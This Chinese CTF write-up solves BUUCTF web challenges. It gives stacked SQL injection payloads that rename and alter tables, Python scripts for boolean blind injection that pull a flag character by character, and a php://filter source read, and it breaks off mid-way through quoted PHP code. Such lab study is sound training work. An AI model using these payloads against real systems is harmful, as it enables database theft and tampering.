题目目录参考https://ca01h.top/Web_security/ctf_writeup/8.buuctf%E5%88%B7%E9%A2%98%E2%80%94%E2%80%94XSS/
随便注
题目来源:强网杯2019
题目链接:https://buuoj.cn/challenges#[%E5%BC%BA%E7%BD%91%E6%9D%AF%202019]%E9%9A%8F%E4%BE%BF%E6%B3%A8
考察:堆叠注入,sql的show语句,sql的预编译,sql修改表
参考:https://www.cnblogs.com/chalan630/p/12583667.html,https://ca01h.top/Web_security/ctf_writeup/7.buuctf%E5%88%B7%E9%A2%98%E2%80%94%E2%80%94SQL%E6%B3%A8%E5%85%A5/
测试语句
1' and '1'='1
能够得出输入
1
时一样的回显
1' # 报错
1'--+ # 正常且为True
1' and 1=1 --+ # 正常且为True
1' and 1=2 --+ # 正常且为False
?inject=1' order by 3--+ # error 1054 : Unknown column '3' in 'order clause'
inject=1'; show tables; --+ $ # 1919810931114514 words
?inject=1'; show columns from words; --+ #
show columns from `1919810931114514`;--+
words {
id int(10);
data varchar(20);
}
1919810931114514{
flag varchar(100);
}
payload1:修改表
?inject=1'; rename table `words` to `words1`; rename table `1919810931114514` to `words`; alter table `words` change `flag` `id` VARCHAR(100) character set utf8 collate utf8_general_ci not null;--+
payload2:预编译
1';Set @a=concat("sel","ect flag from `1919810931114514`");Prepare s from @a; execute s; --+
flag
flag{34745aea-2541-43e6-884f-c67988afc34a}
sql正常注入流程
1 # 正常输入
1' # 若报错,则单引号为可能的注入点
1' --+ # 判断注入类型
1' and 1=1 --+ # 判断注入类型
1' and 1=2 --+ # 判断注入类型
1' order by 3 --+ # 判断列数
sql的show命令
show databases;
show tables;
show table from db_name;
show engine;
show character set; #显示支持哪些字符集
show columns;
show create databases; #显示已经创建的库,创建时的语句
show create table; #显示已经创建的表,创建时的语句
sql堆叠注入
添加分号;即可实现同一行执行多个sql语句
sql修改表
rename table `words` to `test`;
rename table `1919810931114514` to `words`;
alter table `words` change `flag` `id` varchar(100);
sql预编译
SET; # 用于设置变量名和值
PREPARE stmt_name FROM preparable_stmt; # 用于预备一个语句,并赋予名称,以后可以引用该语句
EXECUTE stmt_name; # 执行语句
{DEALLOCATE | DROP} PREPARE stmt_name; # 用来释放掉预处理的语句
实例
set @sql=CONCAT('se','lect * from `1919810931114514`;');
prepare stmt from @sql;
execute stmt;
hack world
来源:[CISCN2019 华北赛区 Day2 Web1]
链接:https://buuoj.cn/challenges#[CISCN2019%20%E5%8D%8E%E5%8C%97%E8%B5%9B%E5%8C%BA%20Day2%20Web1]Hack%20World
参考:https://ca01h.top/Web_security/ctf_writeup/7.buuctf%E5%88%B7%E9%A2%98%E2%80%94%E2%80%94SQL%E6%B3%A8%E5%85%A5/#CISCN2019-Hack-world
考察:bool盲注
看到payload想骂脏话
尝试常规输入,1和2可以,之后都不行
尝试常规的注入,只有单引号时会返回bool(false),应该提示bool型盲注吧
payload为
if(ascii(substr((select(flag)from(flag)),1,1))=ascii('f'),1,2)
由于1和2输出不同,根据这个进行注入即可
可以通过一个字典,观察哪些字符被waf过滤
脚本
import requests
url="http://a9e8a73f-f3d4-4ee4-a165-78c21730f40d.node3.buuoj.cn/index.php"
text1 = "Hello, glzjin wants a girlfriend."
text2 = "Do you want to be my girlfriend?"
ans = ""
for i in range(60):
# print("debug")
flag = False
for j in range(0,256):
c = chr(j)
# print(c)
s = "if(ascii(substr((select(flag)from(flag)),{},1))={},1,2)".format(i+1, j) #注意此处必须转成ascii码判断,因为sql中不区分大小写,直接判断字符会有双引号单引号大小写等问题
post_data = {
"id": s
}
# print(s)
response = requests.post(url, post_data)
if text1 in response.text:
flag = True
ans += c
print(c)
break
if flag == False:
break
print(ans)
# if(substr(select(flag)from(flag),{},1)={},1,2)
这个脚本比较慢,提高效率的方法有两个。一个是转换成ascii码查找(本题过滤了ord,因此只能用ascii进行转码),一个是range下限设置为32('a’从32开始)
wp提供了一个二分脚本
import requests
url = 'http://a9475c38-821c-4b23-aa96-87730f0863fe.node3.buuoj.cn/index.php'
flag = 'Hello, glzjin wants a girlfriend.'
result = ''
for i in range(1, 50):
sleep(1)
high = 127
low = 32
mid = (high + low) // 2
while high > low:
payload = "if(ascii(substr((select(flag)from(flag)),{index},1))>{char},1,2)".format(index=i, char=mid)
data = {'id': payload}
response = requests.post(url=url, data=data)
if flag in response.text:
low = mid + 1
else:
high = mid
mid = (high + low) // 2
result += chr(mid)
print(result)
CyberPunk
题目来源:[CISCN2019 华北赛区 Day1 Web5]
链接:https://buuoj.cn/challenges#[CISCN2019%20%E5%8D%8E%E5%8C%97%E8%B5%9B%E5%8C%BA%20Day1%20Web5]CyberPunk
考察:php伪协议,xpath报错注入,load_file
参考:https://www.cnblogs.com/wangtanzhi/p/12318551.html
第一步
首先进入页面,index界面可以用get的方式提交file参数,即可使用php伪协议直接读取源码
http://xxx.xxx/index.php?file=php://filter/convert.base64-encode/resource=index.php
第二步
<?php //index.php
ini_set('open_basedir', '/var/www/html/');
// $file = $_GET["file"];
$file = (isset($_GET['file']) ? $_GET['file'] : null);
if (isset($file)){
if (preg_match("/phar|zip|bzip2|zlib|data|input|%00/i",$file)) {
echo('no way!');
exit;
}
@include($file);
}
?>
<!--?file=?-->
<?php //change.php
require_once "config.php";
if(!empty($_POST["user_name"]) && !empty($_POST["address"]) && !empty($_POST["phone"]))
{
$msg = '';
$pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i';
$user_name = $_POST["user_name"];
$address = addslashes($_POST["address"]);
$phone = $_POST["phone"];
if (preg_match($pattern,$user_name) || preg_match($pattern,$phone)){
$msg = 'no sql inject!';
}else{
$sql = "select * from `user` where `user_name`='{$user_name}'